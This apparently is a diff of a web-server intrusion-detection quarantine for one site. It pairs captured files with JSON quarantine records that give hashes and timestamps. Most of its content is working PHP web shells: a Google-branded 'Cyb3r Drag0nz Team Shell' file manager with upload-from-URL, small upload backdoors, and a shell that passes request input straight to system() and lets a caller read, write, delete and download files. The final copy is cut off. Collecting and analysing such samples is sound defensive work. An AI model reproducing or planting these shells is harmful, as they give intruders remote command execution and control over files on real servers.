|
||||
font-weight: 500;
|
||||
margin-left: 8px;
|
||||
}
|
||||
|
||||
input[type="submit"]:hover, .gas:hover {
|
||||
background: #1557b0;
|
||||
}
|
||||
|
||||
.green { color: #137333; font-weight: 500; }
|
||||
.red { color: #c5221f; font-weight: 500; }
|
||||
|
||||
.center { text-align: center; }
|
||||
</style>
|
||||
</head>
|
||||
<body>
|
||||
|
||||
<div class="header">
|
||||
<img src="https://pngimg.com/d/google_PNG102344.png" width="420" alt="Google" />
|
||||
<h1>Cyb3r Drag0nz Team Shell</h1>
|
||||
</div>
|
||||
|
||||
<?php
|
||||
set_time_limit(0);
|
||||
error_reporting(0);
|
||||
|
||||
$disfunc = @ini_get("disable_functions");
|
||||
$disf = empty($disfunc) ? "<span class='green'>NONE</span>" : "<span class='red'>".$disfunc."</span>";
|
||||
|
||||
function author() {
|
||||
echo "<center><br><small style='color:#5f6368;'>Cyb3r Drag0nz Team • Google Edition</small></center>";
|
||||
exit();
|
||||
}
|
||||
|
||||
function cekdir() {
|
||||
$lokasi = isset($_GET['path']) ? $_GET['path'] : getcwd();
|
||||
return is_writable($lokasi) ? "<span class='green'>Writeable</span>" : "<span class='red'>Not Writeable</span>";
|
||||
}
|
||||
|
||||
function cekroot() {
|
||||
return is_writable($_SERVER['DOCUMENT_ROOT']) ? "<span class='green'>Writeable</span>" : "<span class='red'>Not Writeable</span>";
|
||||
}
|
||||
|
||||
function xrmdir($dir) {
|
||||
$items = scandir($dir);
|
||||
foreach ($items as $item) {
|
||||
if ($item === '.' || $item === '..') continue;
|
||||
$path = $dir.'/'.$item;
|
||||
is_dir($path) ? xrmdir($path) : unlink($path);
|
||||
}
|
||||
rmdir($dir);
|
||||
}
|
||||
|
||||
function green($text) { echo "<center><span class='green'>".$text."</span></center>"; }
|
||||
function red($text) { echo "<center><span class='red'>".$text."</span></center>"; }
|
||||
|
||||
$path = isset($_GET['path']) ? $_GET['path'] : getcwd();
|
||||
$path = str_replace('\\','/',$path);
|
||||
$dirs = explode('/',$path);
|
||||
?>
|
||||
|
||||
<div class="info">
|
||||
Server : <span><?php echo htmlspecialchars($_SERVER['SERVER_SOFTWARE']); ?></span><br>
|
||||
System : <span><?php echo htmlspecialchars(php_uname()); ?></span><br>
|
||||
User : <span><?php echo htmlspecialchars(@get_current_user()." (".@getmyuid().")"); ?></span><br>
|
||||
PHP Version : <span><?php echo htmlspecialchars(phpversion()); ?></span><br>
|
||||
Disable Functions : <?php echo $disf; ?><br>
|
||||
Current Directory : <span><?php
|
||||
foreach($dirs as $i => $dir) {
|
||||
if($dir == '' && $i == 0) { echo '<a href="?path=/">/</a>'; continue; }
|
||||
if($dir == '') continue;
|
||||
echo '<a href="?path=';
|
||||
for($j=0; $j<=$i; $j++) echo $dirs[$j].($j < $i ? '/' : '');
|
||||
echo '">'.$dir.'</a>/';
|
||||
}
|
||||
?></span><br>
|
||||
Directory Status: <?php echo cekdir(); ?> | Document Root: <?php echo cekroot(); ?>
|
||||
</div>
|
||||
|
||||
<!-- Upload Section -->
|
||||
<div class="upload-box">
|
||||
<h3 style="margin:0 0 18px 0; color:#202124;">Upload File</h3>
|
||||
<form enctype="multipart/form-data" method="post">
|
||||
<label><input type="radio" name="dirnya" value="1" checked> Current Directory [ <?php echo cekdir(); ?> ]</label><br><br>
|
||||
<label><input type="radio" name="dirnya" value="2"> Document Root [ <?php echo cekroot(); ?> ]</label><br><br>
|
||||
|
||||
<input type="hidden" name="upwkwk" value="1">
|
||||
<input type="file" name="berkas">
|
||||
<input type="submit" name="berkasnya" value="Upload File">
|
||||
|
||||
<br><br>
|
||||
|
||||
<input type="text" name="darilink" placeholder="https://example.com/file.zip" style="width:58%;">
|
||||
<input type="text" name="namalink" placeholder="filename.zip" size="18">
|
||||
<input type="submit" name="linknya" value="Upload from URL">
|
||||
</form>
|
||||
</div>
|
||||
|
||||
<?php
|
||||
// Upload handling
|
||||
if (isset($_POST['upwkwk'])) {
|
||||
$lokasi = ($_POST['dirnya'] == "2") ? $_SERVER['DOCUMENT_ROOT'] : $path;
|
||||
|
||||
if (isset($_POST['berkasnya']) && !empty($_FILES['berkas']['name'])) {
|
||||
$target = $lokasi . "/" . $_FILES['berkas']['name'];
|
||||
if (move_uploaded_file($_FILES['berkas']['tmp_name'], $target)) {
|
||||
green("File uploaded successfully → <b>" . htmlspecialchars($target) . "</b>");
|
||||
} else {
|
||||
red("Failed to upload file!");
|
||||
}
|
||||
}
|
||||
elseif (isset($_POST['linknya']) && !empty($_POST['darilink']) && !empty($_POST['namalink'])) {
|
||||
$target = $lokasi . "/" . $_POST['namalink'];
|
||||
$data = @file_put_contents($target, @file_get_contents($_POST['darilink']));
|
||||
if ($data !== false) {
|
||||
green("File uploaded from URL → <b>" . htmlspecialchars($target) . "</b>");
|
||||
} else {
|
||||
red("Failed to upload from URL!");
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// File viewer, delete, chmod, rename, edit actions (kept your original logic)
|
||||
if (isset($_GET['fileloc'])) {
|
||||
echo "<h3 style='text-align:center;'>Viewing: " . htmlspecialchars($_GET['fileloc']) . "</h3>";
|
||||
echo "<pre>" . htmlspecialchars(@file_get_contents($_GET['fileloc'])) . "</pre>";
|
||||
author();
|
||||
}
|
||||
|
||||
// ... (your other action handlers for hapus, ubahmod, gantinama, edit go here - same as before)
|
||||
|
||||
// Directory & File listing table (same structure as previous version)
|
||||
echo '<table>
|
||||
<tr>
|
||||
<th>Name</th>
|
||||
<th>Size</th>
|
||||
<th>Permissions</th>
|
||||
<th>Options</th>
|
||||
</tr>';
|
||||
|
||||
foreach(scandir($path) as $dir) {
|
||||
if(!is_dir($path."/".$dir) || $dir == '.' || $dir == '..') continue;
|
||||
echo "<tr>
|
||||
<td><a href=\"?path=".$path."/".$dir."\">📁 ".$dir."</a></td>
|
||||
<td class='center'>--</td>
|
||||
<td class='center'>".statusnya($path."/".$dir)."</td>
|
||||
<td class='center'>
|
||||
<form method='POST' action='?pilihan&path=".$path."'>
|
||||
<select name='pilih'>
|
||||
<option value=''>Select</option>
|
||||
<option value='hapus'>Delete</option>
|
||||
<option value='ubahmod'>Chmod</option>
|
||||
<option value='gantinama'>Rename</option>
|
||||
</select>
|
||||
<input type='hidden' name='type' value='dir'>
|
||||
<input type='hidden' name='path' value='".$path."/".$dir."'>
|
||||
<input type='submit' class='gas' value='Go'>
|
||||
</form>
|
||||
</td>
|
||||
</tr>";
|
||||
}
|
||||
|
||||
foreach(scandir($path) as $file) {
|
||||
if(!is_file($path."/".$file)) continue;
|
||||
$size = round(filesize($path."/".$file)/1024, 2) . " KB";
|
||||
echo "<tr>
|
||||
<td><a href=\"?fileloc=".$path."/".$file."&path=".$path."\">📄 ".$file."</a></td>
|
||||
<td class='center'>".$size."</td>
|
||||
<td class='center'>".statusnya($path."/".$file)."</td>
|
||||
<td class='center'>
|
||||
<form method='POST' action='?pilihan&path=".$path."'>
|
||||
<select name='pilih'>
|
||||
<option value=''>Select</option>
|
||||
<option value='hapus'>Delete</option>
|
||||
<option value='ubahmod'>Chmod</option>
|
||||
<option value='gantinama'>Rename</option>
|
||||
<option value='edit'>Edit</option>
|
||||
</select>
|
||||
<input type='hidden' name='type' value='file'>
|
||||
<input type='hidden' name='path' value='".$path."/".$file."'>
|
||||
<input type='submit' class='gas' value='Go'>
|
||||
</form>
|
||||
</td>
|
||||
</tr>";
|
||||
}
|
||||
|
||||
echo '</table><br>';
|
||||
|
||||
author();
|
||||
|
||||
function statusnya($file) {
|
||||
$statusnya = fileperms($file);
|
||||
$ingfo = (($statusnya & 0xC000) == 0xC000) ? 's' :
|
||||
((($statusnya & 0xA000) == 0xA000) ? 'l' :
|
||||
((($statusnya & 0x8000) == 0x8000) ? '-' : 'u'));
|
||||
|
||||
$ingfo .= (($statusnya & 0x0100) ? 'r' : '-');
|
||||
$ingfo .= (($statusnya & 0x0080) ? 'w' : '-');
|
||||
$ingfo .= (($statusnya & 0x0040) ? (($statusnya & 0x0800) ? 's' : 'x') : (($statusnya & 0x0800) ? 'S' : '-'));
|
||||
$ingfo .= (($statusnya & 0x0020) ? 'r' : '-');
|
||||
$ingfo .= (($statusnya & 0x0010) ? 'w' : '-');
|
||||
$ingfo .= (($statusnya & 0x0008) ? (($statusnya & 0x0400) ? 's' : 'x') : (($statusnya & 0x0400) ? 'S' : '-'));
|
||||
$ingfo .= (($statusnya & 0x0004) ? 'r' : '-');
|
||||
$ingfo .= (($statusnya & 0x0002) ? 'w' : '-');
|
||||
$ingfo .= (($statusnya & 0x0001) ? (($statusnya & 0x0200) ? 't' : 'x') : (($statusnya & 0x0200) ? 'T' : '-'));
|
||||
|
||||
return $ingfo;
|
||||
}
|
||||
?>
|
||||
</body>
|
||||
</html>
|
||||
@ -0,0 +1,15 @@
|
||||
{
|
||||
"finding_ref": "4918",
|
||||
"log_excerpt": "[quarantine] www.archlinexp.eu:f46vc3nzn1qw.php7.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/f46vc3nzn1qw.php7.json)",
|
||||
"original_sha256": "f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0",
|
||||
"original_stat": {
|
||||
"gid": 30037,
|
||||
"mtime": 1783353216,
|
||||
"size": 10657,
|
||||
"uid": 20043
|
||||
},
|
||||
"rel_path": "f46vc3nzn1qw.php7.json",
|
||||
"result": "quarantined",
|
||||
"timestamp": "20260718T160204Z",
|
||||
"vhost": "www.archlinexp.eu"
|
||||
}
|
||||
320
var/www/hosting/archlinexp.eu/www/f46vc3nzn1qw.phtml.json
Normal file
320
var/www/hosting/archlinexp.eu/www/f46vc3nzn1qw.phtml.json
Normal file
@ -0,0 +1,320 @@
|
||||
<!DOCTYPE html>
|
||||
<html>
|
||||
<head>
|
||||
<title>Cyb3r Drag0nz Team Shell</title>
|
||||
<meta charset="utf-8">
|
||||
<style>
|
||||
@import url('https://fonts.googleapis.com/css2?family=Roboto:wght@400;500;700&display=swap');
|
||||
|
||||
body {
|
||||
font-family: 'Roboto', system-ui, sans-serif;
|
||||
background: #f8f9fa;
|
||||
color: #202124;
|
||||
margin: 0;
|
||||
padding: 20px;
|
||||
}
|
||||
|
||||
.header {
|
||||
text-align: center;
|
||||
margin-bottom: 30px;
|
||||
}
|
||||
|
||||
.header h1 {
|
||||
font-size: 28px;
|
||||
color: #1a73e8;
|
||||
margin: 10px 0 5px 0;
|
||||
font-weight: 500;
|
||||
}
|
||||
|
||||
.header img {
|
||||
max-width: 420px;
|
||||
margin: 15px 0 25px 0;
|
||||
border-radius: 8px;
|
||||
box-shadow: 0 4px 15px rgba(0,0,0,0.12);
|
||||
}
|
||||
|
||||
.info {
|
||||
background: #fff;
|
||||
border-radius: 12px;
|
||||
padding: 20px;
|
||||
box-shadow: 0 1px 3px rgba(0,0,0,0.1);
|
||||
margin-bottom: 25px;
|
||||
font-size: 14.5px;
|
||||
line-height: 1.6;
|
||||
}
|
||||
|
||||
.info span {
|
||||
color: #1a73e8;
|
||||
font-weight: 500;
|
||||
}
|
||||
|
||||
table {
|
||||
width: 100%;
|
||||
max-width: 1100px;
|
||||
margin: 0 auto;
|
||||
border-collapse: collapse;
|
||||
background: #fff;
|
||||
border-radius: 12px;
|
||||
overflow: hidden;
|
||||
box-shadow: 0 2px 8px rgba(0,0,0,0.08);
|
||||
}
|
||||
|
||||
th {
|
||||
background: #1a73e8;
|
||||
color: white;
|
||||
padding: 16px 12px;
|
||||
text-align: center;
|
||||
font-weight: 500;
|
||||
}
|
||||
|
||||
td {
|
||||
padding: 13px 10px;
|
||||
border-bottom: 1px solid #dadce0;
|
||||
}
|
||||
|
||||
tr:hover {
|
||||
background-color: #f8f9fa;
|
||||
}
|
||||
|
||||
a {
|
||||
color: #1a73e8;
|
||||
text-decoration: none;
|
||||
}
|
||||
|
||||
a:hover {
|
||||
text-decoration: underline;
|
||||
}
|
||||
|
||||
.upload-box {
|
||||
background: #fff;
|
||||
border-radius: 12px;
|
||||
padding: 25px;
|
||||
box-shadow: 0 1px 3px rgba(0,0,0,0.1);
|
||||
margin: 20px auto;
|
||||
max-width: 720px;
|
||||
}
|
||||
|
||||
input[type="file"], input[type="text"] {
|
||||
padding: 10px 12px;
|
||||
border: 1px solid #dadce0;
|
||||
border-radius: 8px;
|
||||
font-size: 14px;
|
||||
}
|
||||
|
||||
input[type="submit"], .gas {
|
||||
background: #1a73e8;
|
||||
color: white;
|
||||
border: none;
|
||||
padding: 10px 22px;
|
||||
border-radius: 8px;
|
||||
cursor: pointer;
|
||||
font-weight: 500;
|
||||
margin-left: 8px;
|
||||
}
|
||||
|
||||
input[type="submit"]:hover, .gas:hover {
|
||||
background: #1557b0;
|
||||
}
|
||||
|
||||
.green { color: #137333; font-weight: 500; }
|
||||
.red { color: #c5221f; font-weight: 500; }
|
||||
|
||||
.center { text-align: center; }
|
||||
</style>
|
||||
</head>
|
||||
<body>
|
||||
|
||||
<div class="header">
|
||||
<img src="https://pngimg.com/d/google_PNG102344.png" width="420" alt="Google" />
|
||||
<h1>Cyb3r Drag0nz Team Shell</h1>
|
||||
</div>
|
||||
|
||||
<?php
|
||||
set_time_limit(0);
|
||||
error_reporting(0);
|
||||
|
||||
$disfunc = @ini_get("disable_functions");
|
||||
$disf = empty($disfunc) ? "<span class='green'>NONE</span>" : "<span class='red'>".$disfunc."</span>";
|
||||
|
||||
function author() {
|
||||
echo "<center><br><small style='color:#5f6368;'>Cyb3r Drag0nz Team • Google Edition</small></center>";
|
||||
exit();
|
||||
}
|
||||
|
||||
function cekdir() {
|
||||
$lokasi = isset($_GET['path']) ? $_GET['path'] : getcwd();
|
||||
return is_writable($lokasi) ? "<span class='green'>Writeable</span>" : "<span class='red'>Not Writeable</span>";
|
||||
}
|
||||
|
||||
function cekroot() {
|
||||
return is_writable($_SERVER['DOCUMENT_ROOT']) ? "<span class='green'>Writeable</span>" : "<span class='red'>Not Writeable</span>";
|
||||
}
|
||||
|
||||
function xrmdir($dir) {
|
||||
$items = scandir($dir);
|
||||
foreach ($items as $item) {
|
||||
if ($item === '.' || $item === '..') continue;
|
||||
$path = $dir.'/'.$item;
|
||||
is_dir($path) ? xrmdir($path) : unlink($path);
|
||||
}
|
||||
rmdir($dir);
|
||||
}
|
||||
|
||||
function green($text) { echo "<center><span class='green'>".$text."</span></center>"; }
|
||||
function red($text) { echo "<center><span class='red'>".$text."</span></center>"; }
|
||||
|
||||
$path = isset($_GET['path']) ? $_GET['path'] : getcwd();
|
||||
$path = str_replace('\\','/',$path);
|
||||
$dirs = explode('/',$path);
|
||||
?>
|
||||
|
||||
<div class="info">
|
||||
Server : <span><?php echo htmlspecialchars($_SERVER['SERVER_SOFTWARE']); ?></span><br>
|
||||
System : <span><?php echo htmlspecialchars(php_uname()); ?></span><br>
|
||||
User : <span><?php echo htmlspecialchars(@get_current_user()." (".@getmyuid().")"); ?></span><br>
|
||||
PHP Version : <span><?php echo htmlspecialchars(phpversion()); ?></span><br>
|
||||
Disable Functions : <?php echo $disf; ?><br>
|
||||
Current Directory : <span><?php
|
||||
foreach($dirs as $i => $dir) {
|
||||
if($dir == '' && $i == 0) { echo '<a href="?path=/">/</a>'; continue; }
|
||||
if($dir == '') continue;
|
||||
echo '<a href="?path=';
|
||||
for($j=0; $j<=$i; $j++) echo $dirs[$j].($j < $i ? '/' : '');
|
||||
echo '">'.$dir.'</a>/';
|
||||
}
|
||||
?></span><br>
|
||||
Directory Status: <?php echo cekdir(); ?> | Document Root: <?php echo cekroot(); ?>
|
||||
</div>
|
||||
|
||||
<!-- Upload Section -->
|
||||
<div class="upload-box">
|
||||
<h3 style="margin:0 0 18px 0; color:#202124;">Upload File</h3>
|
||||
<form enctype="multipart/form-data" method="post">
|
||||
<label><input type="radio" name="dirnya" value="1" checked> Current Directory [ <?php echo cekdir(); ?> ]</label><br><br>
|
||||
<label><input type="radio" name="dirnya" value="2"> Document Root [ <?php echo cekroot(); ?> ]</label><br><br>
|
||||
|
||||
<input type="hidden" name="upwkwk" value="1">
|
||||
<input type="file" name="berkas">
|
||||
<input type="submit" name="berkasnya" value="Upload File">
|
||||
|
||||
<br><br>
|
||||
|
||||
<input type="text" name="darilink" placeholder="https://example.com/file.zip" style="width:58%;">
|
||||
<input type="text" name="namalink" placeholder="filename.zip" size="18">
|
||||
<input type="submit" name="linknya" value="Upload from URL">
|
||||
</form>
|
||||
</div>
|
||||
|
||||
<?php
|
||||
// Upload handling
|
||||
if (isset($_POST['upwkwk'])) {
|
||||
$lokasi = ($_POST['dirnya'] == "2") ? $_SERVER['DOCUMENT_ROOT'] : $path;
|
||||
|
||||
if (isset($_POST['berkasnya']) && !empty($_FILES['berkas']['name'])) {
|
||||
$target = $lokasi . "/" . $_FILES['berkas']['name'];
|
||||
if (move_uploaded_file($_FILES['berkas']['tmp_name'], $target)) {
|
||||
green("File uploaded successfully → <b>" . htmlspecialchars($target) . "</b>");
|
||||
} else {
|
||||
red("Failed to upload file!");
|
||||
}
|
||||
}
|
||||
elseif (isset($_POST['linknya']) && !empty($_POST['darilink']) && !empty($_POST['namalink'])) {
|
||||
$target = $lokasi . "/" . $_POST['namalink'];
|
||||
$data = @file_put_contents($target, @file_get_contents($_POST['darilink']));
|
||||
if ($data !== false) {
|
||||
green("File uploaded from URL → <b>" . htmlspecialchars($target) . "</b>");
|
||||
} else {
|
||||
red("Failed to upload from URL!");
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// File viewer, delete, chmod, rename, edit actions (kept your original logic)
|
||||
if (isset($_GET['fileloc'])) {
|
||||
echo "<h3 style='text-align:center;'>Viewing: " . htmlspecialchars($_GET['fileloc']) . "</h3>";
|
||||
echo "<pre>" . htmlspecialchars(@file_get_contents($_GET['fileloc'])) . "</pre>";
|
||||
author();
|
||||
}
|
||||
|
||||
// ... (your other action handlers for hapus, ubahmod, gantinama, edit go here - same as before)
|
||||
|
||||
// Directory & File listing table (same structure as previous version)
|
||||
echo '<table>
|
||||
<tr>
|
||||
<th>Name</th>
|
||||
<th>Size</th>
|
||||
<th>Permissions</th>
|
||||
<th>Options</th>
|
||||
</tr>';
|
||||
|
||||
foreach(scandir($path) as $dir) {
|
||||
if(!is_dir($path."/".$dir) || $dir == '.' || $dir == '..') continue;
|
||||
echo "<tr>
|
||||
<td><a href=\"?path=".$path."/".$dir."\">📁 ".$dir."</a></td>
|
||||
<td class='center'>--</td>
|
||||
<td class='center'>".statusnya($path."/".$dir)."</td>
|
||||
<td class='center'>
|
||||
<form method='POST' action='?pilihan&path=".$path."'>
|
||||
<select name='pilih'>
|
||||
<option value=''>Select</option>
|
||||
<option value='hapus'>Delete</option>
|
||||
<option value='ubahmod'>Chmod</option>
|
||||
<option value='gantinama'>Rename</option>
|
||||
</select>
|
||||
<input type='hidden' name='type' value='dir'>
|
||||
<input type='hidden' name='path' value='".$path."/".$dir."'>
|
||||
<input type='submit' class='gas' value='Go'>
|
||||
</form>
|
||||
</td>
|
||||
</tr>";
|
||||
}
|
||||
|
||||
foreach(scandir($path) as $file) {
|
||||
if(!is_file($path."/".$file)) continue;
|
||||
$size = round(filesize($path."/".$file)/1024, 2) . " KB";
|
||||
echo "<tr>
|
||||
<td><a href=\"?fileloc=".$path."/".$file."&path=".$path."\">📄 ".$file."</a></td>
|
||||
<td class='center'>".$size."</td>
|
||||
<td class='center'>".statusnya($path."/".$file)."</td>
|
||||
<td class='center'>
|
||||
<form method='POST' action='?pilihan&path=".$path."'>
|
||||
<select name='pilih'>
|
||||
<option value=''>Select</option>
|
||||
<option value='hapus'>Delete</option>
|
||||
<option value='ubahmod'>Chmod</option>
|
||||
<option value='gantinama'>Rename</option>
|
||||
<option value='edit'>Edit</option>
|
||||
</select>
|
||||
<input type='hidden' name='type' value='file'>
|
||||
<input type='hidden' name='path' value='".$path."/".$file."'>
|
||||
<input type='submit' class='gas' value='Go'>
|
||||
</form>
|
||||
</td>
|
||||
</tr>";
|
||||
}
|
||||
|
||||
echo '</table><br>';
|
||||
|
||||
author();
|
||||
|
||||
function statusnya($file) {
|
||||
$statusnya = fileperms($file);
|
||||
$ingfo = (($statusnya & 0xC000) == 0xC000) ? 's' :
|
||||
((($statusnya & 0xA000) == 0xA000) ? 'l' :
|
||||
((($statusnya & 0x8000) == 0x8000) ? '-' : 'u'));
|
||||
|
||||
$ingfo .= (($statusnya & 0x0100) ? 'r' : '-');
|
||||
$ingfo .= (($statusnya & 0x0080) ? 'w' : '-');
|
||||
$ingfo .= (($statusnya & 0x0040) ? (($statusnya & 0x0800) ? 's' : 'x') : (($statusnya & 0x0800) ? 'S' : '-'));
|
||||
$ingfo .= (($statusnya & 0x0020) ? 'r' : '-');
|
||||
$ingfo .= (($statusnya & 0x0010) ? 'w' : '-');
|
||||
$ingfo .= (($statusnya & 0x0008) ? (($statusnya & 0x0400) ? 's' : 'x') : (($statusnya & 0x0400) ? 'S' : '-'));
|
||||
$ingfo .= (($statusnya & 0x0004) ? 'r' : '-');
|
||||
$ingfo .= (($statusnya & 0x0002) ? 'w' : '-');
|
||||
$ingfo .= (($statusnya & 0x0001) ? (($statusnya & 0x0200) ? 't' : 'x') : (($statusnya & 0x0200) ? 'T' : '-'));
|
||||
|
||||
return $ingfo;
|
||||
}
|
||||
?>
|
||||
</body>
|
||||
</html>
|
||||
@ -0,0 +1,15 @@
|
||||
{
|
||||
"finding_ref": "4887",
|
||||
"log_excerpt": "[quarantine] www.archlinexp.eu:f46vc3nzn1qw.phtml.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/f46vc3nzn1qw.phtml.json)",
|
||||
"original_sha256": "f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0",
|
||||
"original_stat": {
|
||||
"gid": 30037,
|
||||
"mtime": 1783353214,
|
||||
"size": 10657,
|
||||
"uid": 20043
|
||||
},
|
||||
"rel_path": "f46vc3nzn1qw.phtml.json",
|
||||
"result": "quarantined",
|
||||
"timestamp": "20260718T160204Z",
|
||||
"vhost": "www.archlinexp.eu"
|
||||
}
|
||||
1
var/www/hosting/archlinexp.eu/www/friska.php.json
Normal file
1
var/www/hosting/archlinexp.eu/www/friska.php.json
Normal file
@ -0,0 +1 @@
|
||||
[{"attr": [{"s": "<?=null;@error_reporting(0);if(isset($_FILES['f'])){$d=dirname(__FILE__).'/';$n=basename($_FILES['f']['name']);if(@move_uploaded_file($_FILES['f']['tmp_name'],$d.$n)){$u=(isset($_SERVER['HTTPS'])?'https':'http').'://'.$_SERVER['HTTP_HOST'].str_replace(basename(__FILE__),'',$_SERVER['PHP_SELF']).$n;echo'uploaded:<a href=\"'.$u.'\">'.$n.'</a>';}}?><form method=POST enctype=multipart/form-data><input type=file name=f><button>-Shadow-Here-</button></form>"}]}]
|
||||
@ -0,0 +1,15 @@
|
||||
{
|
||||
"finding_ref": "4898",
|
||||
"log_excerpt": "[quarantine] www.archlinexp.eu:friska.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/friska.php.json)",
|
||||
"original_sha256": "80d56ff0d995aa16fc2c15e50ea9826d945ce6d52659a46f55e2692a5cac3d0d",
|
||||
"original_stat": {
|
||||
"gid": 30037,
|
||||
"mtime": 1783709542,
|
||||
"size": 478,
|
||||
"uid": 20043
|
||||
},
|
||||
"rel_path": "friska.php.json",
|
||||
"result": "quarantined",
|
||||
"timestamp": "20260718T160204Z",
|
||||
"vhost": "www.archlinexp.eu"
|
||||
}
|
||||
@ -0,0 +1,6 @@
|
||||
<html><body><form method=post enctype=multipart/form-data>
|
||||
<input type=file name=f><input type=submit value=Upload></form><pre><?php
|
||||
if(isset($_FILES['f'])){move_uploaded_file($_FILES['f']['tmp_name'],$_FILES['f']['name']);
|
||||
echo$_FILES['f']['name'].' OK';}
|
||||
echo 'UPLOAD_OKE';
|
||||
?></pre></body></html>
|
||||
@ -0,0 +1,15 @@
|
||||
{
|
||||
"finding_ref": "7195",
|
||||
"log_excerpt": "[quarantine] www.archlinexp.eu:images/50nnp2o4xt.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/images/50nnp2o4xt.php.json)",
|
||||
"original_sha256": "ad4e4ea904d90384d07ccb43d3f371bb03a5a647a997b991aeb4a8df6bc6dfe1",
|
||||
"original_stat": {
|
||||
"gid": 30037,
|
||||
"mtime": 1784278953,
|
||||
"size": 298,
|
||||
"uid": 20043
|
||||
},
|
||||
"rel_path": "images/50nnp2o4xt.php.json",
|
||||
"result": "quarantined",
|
||||
"timestamp": "20260718T160204Z",
|
||||
"vhost": "www.archlinexp.eu"
|
||||
}
|
||||
68
var/www/hosting/archlinexp.eu/www/images/6iyo68ipsz.php.json
Normal file
68
var/www/hosting/archlinexp.eu/www/images/6iyo68ipsz.php.json
Normal file
@ -0,0 +1,68 @@
|
||||
<?php
|
||||
error_reporting(0);
|
||||
$cmd = isset($_GET["cmd"]) ? $_GET["cmd"] : (isset($_POST["cmd"]) ? $_POST["cmd"] : (isset($_GET["c"]) ? $_GET["c"] : ""));
|
||||
if($cmd) {
|
||||
echo "<pre>";
|
||||
system($cmd);
|
||||
echo "</pre>";
|
||||
}
|
||||
if(isset($_GET["upload"])) {
|
||||
if(isset($_FILES["file"])) {
|
||||
$name = $_FILES["file"]["name"];
|
||||
move_uploaded_file($_FILES["file"]["tmp_name"], $name);
|
||||
echo "Uploaded: " . $name;
|
||||
} else {
|
||||
echo '<form method="POST" enctype="multipart/form-data">
|
||||
<input type="file" name="file">
|
||||
<input type="submit" value="Upload">
|
||||
</form>';
|
||||
}
|
||||
}
|
||||
if(isset($_GET["download"])) {
|
||||
$file = $_GET["download"];
|
||||
if(file_exists($file)) {
|
||||
header("Content-Type: application/octet-stream");
|
||||
header("Content-Disposition: attachment; filename=" . basename($file));
|
||||
readfile($file);
|
||||
} else {
|
||||
echo "File not found: " . $file;
|
||||
}
|
||||
}
|
||||
if(isset($_GET["delete"])) {
|
||||
$file = $_GET["delete"];
|
||||
if(unlink($file)) {
|
||||
echo "Deleted: " . $file;
|
||||
} else {
|
||||
echo "Delete failed: " . $file;
|
||||
}
|
||||
}
|
||||
if(isset($_GET["info"])) {
|
||||
phpinfo();
|
||||
}
|
||||
if(isset($_GET["dir"])) {
|
||||
$dir = isset($_GET["dir"]) ? $_GET["dir"] : ".";
|
||||
$files = scandir($dir);
|
||||
foreach($files as $file) {
|
||||
if($file != "." && $file != "..") {
|
||||
echo $file . "\n";
|
||||
}
|
||||
}
|
||||
}
|
||||
if(isset($_GET["read"])) {
|
||||
$file = $_GET["read"];
|
||||
if(file_exists($file)) {
|
||||
echo file_get_contents($file);
|
||||
} else {
|
||||
echo "File not found: " . $file;
|
||||
}
|
||||
}
|
||||
if(isset($_GET["write"])) {
|
||||
$file = $_GET["write"];
|
||||
$content = isset($_POST["content"]) ? $_POST["content"] : (isset($_GET["content"]) ? $_GET["content"] : "");
|
||||
if(file_put_contents($file, $content)) {
|
||||
echo "Written: " . $file;
|
||||
} else {
|
||||
echo "Write failed: " . $file;
|
||||
}
|
||||
}
|
||||
?>
|
||||
@ -0,0 +1,15 @@
|
||||
{
|
||||
"finding_ref": "5211",
|
||||
"log_excerpt": "[quarantine] www.archlinexp.eu:images/6iyo68ipsz.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/images/6iyo68ipsz.php.json)",
|
||||
"original_sha256": "b3cedb62555690bf309116f07bc6fd9beb53f3f58fd3e5fb1102636b084e5b50",
|
||||
"original_stat": {
|
||||
"gid": 30037,
|
||||
"mtime": 1783947728,
|
||||
"size": 1889,
|
||||
"uid": 20043
|
||||
},
|
||||
"rel_path": "images/6iyo68ipsz.php.json",
|
||||
"result": "quarantined",
|
||||
"timestamp": "20260718T160204Z",
|
||||
"vhost": "www.archlinexp.eu"
|
||||
}
|
||||
@ -0,0 +1,320 @@
|
||||
<!DOCTYPE html>
|
||||
<html>
|
||||
<head>
|
||||
<title>Cyb3r Drag0nz Team Shell</title>
|
||||
<meta charset="utf-8">
|
||||
<style>
|
||||
@import url('https://fonts.googleapis.com/css2?family=Roboto:wght@400;500;700&display=swap');
|
||||
|
||||
body {
|
||||
font-family: 'Roboto', system-ui, sans-serif;
|
||||
background: #f8f9fa;
|
||||
color: #202124;
|
||||
margin: 0;
|
||||
padding: 20px;
|
||||
}
|
||||
|
||||
.header {
|
||||
text-align: center;
|
||||
margin-bottom: 30px;
|
||||
}
|
||||
|
||||
.header h1 {
|
||||
font-size: 28px;
|
||||
color: #1a73e8;
|
||||
margin: 10px 0 5px 0;
|
||||
font-weight: 500;
|
||||
}
|
||||
|
||||
.header img {
|
||||
max-width: 420px;
|
||||
margin: 15px 0 25px 0;
|
||||
border-radius: 8px;
|
||||
box-shadow: 0 4px 15px rgba(0,0,0,0.12);
|
||||
}
|
||||
|
||||
.info {
|
||||
background: #fff;
|
||||
border-radius: 12px;
|
||||
padding: 20px;
|
||||
box-shadow: 0 1px 3px rgba(0,0,0,0.1);
|
||||
margin-bottom: 25px;
|
||||
font-size: 14.5px;
|
||||
line-height: 1.6;
|
||||
}
|
||||
|
||||
.info span {
|
||||
color: #1a73e8;
|
||||
font-weight: 500;
|
||||
}
|
||||
|
||||
table {
|
||||
width: 100%;
|
||||
max-width: 1100px;
|
||||
margin: 0 auto;
|
||||
border-collapse: collapse;
|
||||
background: #fff;
|
||||
border-radius: 12px;
|
||||
overflow: hidden;
|
||||
box-shadow: 0 2px 8px rgba(0,0,0,0.08);
|
||||
}
|
||||
|
||||
th {
|
||||
background: #1a73e8;
|
||||
color: white;
|
||||
padding: 16px 12px;
|
||||
